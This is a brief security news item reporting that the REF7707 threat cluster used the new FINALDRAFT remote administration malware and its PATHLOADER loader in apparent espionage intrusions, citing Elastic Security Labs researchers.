Threat cluster REF7707 has compromised a South American country's foreign ministry and a Southeast Asian university and telecommunications organization in intrusions involving the new FINALDRAFT malware, reports The Hacker News.
Attackers with valid network credentials leveraged Microsoft's certutil app and Windows Remote Management's Remote Shell plugin to facilitate the distribution of the PATHLOADER malware, which then executes the C++-based FINALDRAFT remote administration tool, according to a report from Elastic Security Labs.
Aside from exploiting Microsoft Graph API for command-and-control, FINALDRAFT also enables file alteration, process injection, and network proxying, while deploying the PowerPick utility and circumventing Windows event tracing.
Additional findings revealed the existence of FINALDRAFT for Linux that has been strengthened with shell command execution and self-deletion capabilities.
"The completeness of the tools and the level of engineering involved suggest that the developers are well-organized. The extended time frame of the operation and evidence from our telemetry suggest it's likely an espionage-oriented campaign," said researchers.
